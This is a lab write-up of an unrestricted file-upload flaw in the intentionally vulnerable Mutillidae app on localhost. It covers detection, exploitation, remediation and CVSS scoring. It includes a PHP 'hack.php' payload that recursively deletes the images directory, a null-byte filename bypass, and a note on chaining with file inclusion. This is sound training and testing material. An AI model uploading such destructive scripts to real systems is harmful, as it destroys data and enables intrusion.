## Version 1.4.1
## language: en

Feature:
  TOE:
    Mutillidae
  Category:
  Location:
    http://localhost/mutillidae/upload-file.php
  CWE:
    CWE-434: Unrestricted Upload of File with Dangerous Type
  Rule:
    REQ.043: https://fluidattacks.com/web/rules/043/
    REQ.040: The system must validate that the format (structure)
     of the files corresponds to its extension.
    REQ.041: The system must validate that the content of the files
     transferred to the same system is free of malicious code.
  Goal:
    Upload dangerous file type
  Recommendation:
    Filter file type with a whitelist

  Background:
  Hacker's software:
    | <Software name> | <Version>         |
    | Windows         | 10                |
    | WebScarab Lite  | 20070504-1631     |
    | Firefox         | 67.0.3            |
  TOE information:
    Given I am accessing the site "http://localhost/mutillidae"
    And it is built on php and mysql

  Scenario: Normal use case
    Given I access "http://localhost/mutillidae/index.php?page=upload-file.php"
    And a form for file submission
    Then I upload a image
    And see some information
    """
    Original File Name  Captura.PNG
    Temporary File Name D:\Xampp\tmp\php371.tmp
    Permanent File Name C:\Users\Usuario\AppData\Local\Temp\Captura.PNG
    File Type image/png
    File Size 34 KB
    """

  Scenario: Static detection
    When I look at the code "upload-file.php"
    Then I can see that the vulnerability is being caused by lines 85,86
    Then I conclude that arbritary file type can be uploaded

  Scenario: Dynamic detection
    Given the form of file uploading
    Then I supply a test php file
    When I inspect that upload is successful
    Then I can put harmful code
    When I try others extensions exe, js, sh
    Then Upload is successful
    When I try random extension fofsd
    Then Upload is successful

  Scenario: Exploitation
    Given unrestricted file upload
    Then I can put arbitrary code on the file
    Then I can try deleting files for disturbing the app
    """
    //hack.php file
    function delete_files($target) {
      //php delete function by Lewis Cowles
      if(is_dir($target)){
        $files = glob( $target . '*', GLOB_MARK );
        foreach( $files as $file ){
          delete_files( $file );
        }
        rmdir( $target );
      } elseif(is_file($target)) {
        unlink( $target );
      }
    }
    delete_files('./images');
    echo "You have been hacked!";
    """
    When I upload this at app root "./"
    And execute it through "http://localhost/mutillidae/hack.php"
    Then images are no longer seen (for new users because of cache)

  Scenario: Remediation
    Given that any validation is done
    Then I force the system to always validate
    """
    line 85 changed to
    $lFileValid = TRUE;
    line 86 conditional and its end removed
    """
    When I try to upload php
    Then denied upload
    When I try to trick with null char injection
    """
    file name for uploading
    hack.php%00.jpg
    """
    Then file is uploaded
    But not therated as php
    When I try null char injection again
    But modifying http response directly
    Then I get denied upload
    """
    File extension php not allowed.
    """
    Then I conclude that vulnerability is patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.1/10 (critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.7/10 (high) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    6.7/10 (medium) - CR:L/IR:L/AR:L

  Scenario: Correlations
    vbd/multilidae/0098
      Given include execution of a given argument provided by 0098
      When I provide the path to the uploaded file
      Then I can execute the harmful code
